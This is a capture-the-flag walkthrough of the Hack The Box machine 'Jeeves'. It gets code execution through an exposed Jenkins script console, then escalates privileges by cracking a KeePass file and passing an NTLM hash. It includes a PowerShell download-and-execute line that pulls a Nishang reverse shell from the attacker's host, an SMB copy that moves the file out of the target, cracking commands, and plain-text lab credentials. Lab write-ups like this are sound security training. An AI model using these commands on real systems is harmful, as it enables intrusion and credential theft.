Jeeves HTB

IP

10.10.10.63

initial Nmap scan

sudo nmap -sV -sC -A -oA inital_nmap 10.10.10.63

Full Nmap scan

nmap -p- -sV -oA nmap_full 10.10.10.63

• Nothing to interesting

While we wait for the full scan to complete, we'll work off the initial scan

Ports open

80: HTTP Microsoft IIS 10.0

135: RPC

445: SMB

5000: HTTP Jetty(9.4.z-SNAPSHOT)

SMB

checking if SMB has anonymous authentication

crackmapexec smb 10.10.10.63 -p anonymous -u anonymous --shares

• it does not

Port 80 HTTP

the first thing we see is some kind of search engine

Lets do some dir busting and see if we can discover anything interesting

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.63 -x asp -o dirs.txt

• we dont find anything interesting

catching a request with burp shows nothing interesting we are redirected to a /error.html

But we do see the following

• this doesn't seem right, could be a rabbit hole

port 50000 HTTP

When we navigate to port 50000 we can see the following

Not a lot going on here lets perform some directory busting and see if we can find anything interesting

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.63:50000 -x asp -o dirs.txt

we do find an interesting directory

http://10.10.10.63:50000/askjeeves/

Looks like we Jenkins running on the server

Jenkins

What is jenkins

• an open-source continuous integration/continuous delivery and deployment (CI/CD) automation software DevOps tool is written in java

from the initial home page, we can see the version

Jenkins ver: 2.87

if we refer to

GitHub - gquere/pwn_jenkins: Notes about attacking Jenkins serversGitHub

we can see this version of Jenkins, we can take advantage of the script console and groovy to generate a reverse shell onto the target machine

Let's just confirm this and see if we can execute cmd.exe

cmd = """ cmd.exe /c echo "hello there" """
println cmd.execute().text

as we can see we have code execution on the system

First lets prepare our reverse shell

1. well use the nishang repo

git clone https://github.com/samratashok/nishang.git

1. copy the Invoke-PowerShellTcp.ps1 into our working directory (or where you will transfer from)

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./

1. Within the Invoke-PowerShellTcp.ps1 we want to edit the script

vi Invoke-PowerShellTcp.ps1

Notice at the bottom of the script we added the actual command to execute it with the IP and port we wish to connect from, this little command will execute first giving our script our IP address and Port number to establish the connection

1. Let's start up our python server read to transfer the file and execute it

python3 -m http.server 9010

1. Start our netcat listener

nc -lvnp 9001

1. Now lets pickup our Powershell script and execute it, in the script console

cmd = """ powershell "IEX(New-Object Net.WebClient).downloadstring('http://10.10.16.8:9010/Invoke-PowerShellTcp.ps1')" """
println cmd.execute().text

Once we run the console we can see we have a shell on the system

Privilege escalation via kohsuke

Alright let's get some information about the system

systeminfo

Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00331-20304-47406-AA297
Original Install Date:     10/25/2017, 4:45:33 PM
System Boot Time:          8/10/2023, 5:23:46 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 917 MB
Virtual Memory: Max Size:  2,687 MB
Virtual Memory: Available: 1,528 MB
Virtual Memory: In Use:    1,159 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 10 Hotfix(s) Installed.
                           [01]: KB3150513
                           [02]: KB3161102
                           [03]: KB3172729
                           [04]: KB3173428
                           [05]: KB4021702
                           [06]: KB4022633
                           [07]: KB4033631
                           [08]: KB4035632
                           [09]: KB4051613
                           [10]: KB4041689
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.63
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

well copy and paste this into systeminfo.txt and run wes-ng against it and see if we can find priv esc exploit

first let's update wes

python3 /opt/wesng/wes.py --update

Now let's run it against systeminfo.txt

python3 /opt/wesng/wes.py systeminfo.txt > possible_cves

we do have a number of exploits we could possibly use but will keep this in our back pocket

Let's see what other users are on the machine

net user

• Nothing too interesting here

user privileges

whoami /priv

• possible rotten potato attack, again back pocket

Within the C:\Users\Administrator.jenkins we do find secret.key

58d05496da2496d09036d36c99b56f1e89cc662f3e65a4023de71de7e1df8afb

Running the hash through hash-identifier we can see it is most likely a sha-256 hash, lets try and crack it

hashcat -m 1470 -a 0 secret_key_hash.txt /usr/share/wordlists/rockyou.txt

• hmm can't crack it

within the C:\Users\Administrator.jenkins\users\admin we do find a config.xml file which contains

API token

<apiToken>{AQAAABAAAAAwID3cR3pyZaEkaDPU25Z0S+nrU8+gDgB0JEWORJ5L1P2T+zXc/tSs2IVn1ugWLaui54D6yYki4vhXQtGhqUSeFw=

and a password hash

<passwordHash>#jbcrypt:$2a$10$QyIjgAFa7r3x8IMyqkeCluCB7ddvbR7wUn1GmFJNO2jQp2k8roehO</passwordHash>

Let's see if we can crack it

hashcat -m 3200 -a 0 hash_config_file.txt /usr/share/wordlists/rockyou.txt

While we wait for the hash lets keep hunting around

• Managed to escalate privileges for the hash cracked

In C:\Users\kohsuke\Documents we do find a keepass file, this is interesting let's download this onto our local machine

to download the file to our local machine

1. Let's set up an SMB server on our local machine

impacket-smbserver -smb2support connectToMe ./

1. Target machine

cp CEH.kdbx //10.10.16.8/connectToMe/CEH.kdbx

Now we have the CEH.kdbx file on our local machine

we can download the keepass password manager onto our local machine

sudo apt-get install keepass2

When we try to open the CEH.kdbx file, we are prompted for a master password

keepass2 CEH.kdbx

what we can do is use keepass2john to convert the KeePass database files into a format that can be cracked with John

keepass2john CEH.kdbx > hash.txt

Now we can run john against our new hash

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

we have the password

moonshine1

Lets open our kdbx file again

keepass2 CEH.kdbx

enter the password

passwords

Walmart.com: anonymous: Password
Bank of America: Michael321: 12345
it's a secret: admin: F7WhTrSFDKB6sxHU1cUn
EC-Council: hackerman123: pwndyouall!
Keys to the kingdom: bob: lCEUnYPjNfIuPZSzOySA
DC Recovery PW: administrator: S1TjAtJHKsugh9oC4VZl
Jenkins admin: admin: 
Backup stuff: ?: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Looks like we have an NTLM hash for Backup stuff

and a domain/username

what we can do is utilise the pth-winexe to perform a pass-the-hash attack gaining a shell on the system

pth-winexe -U jenkins/administrator //10.10.10.63 cmd.exe

then we can pass the Backup stuff hash, as this seems to be the only hash in the password database

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

we have successfully passed the hash using the administrator NTLM hash

Reading the Flag

Notice the C:\Users\Administrator\Desktop we can't seem to find the root.txt flag

this is because the hm.txt is an NTF attribute that supports various attributes including a Hidden attribute meaning you can hide another file within another so essentially this hm.txt acts like a folder as it does as a file but if

dir /r

We can view alternative data streams revelling the hidden file

and to read the contents of the file we can use PowerShell for this

powershell (Get-Content hm.txt -Stream root.txt)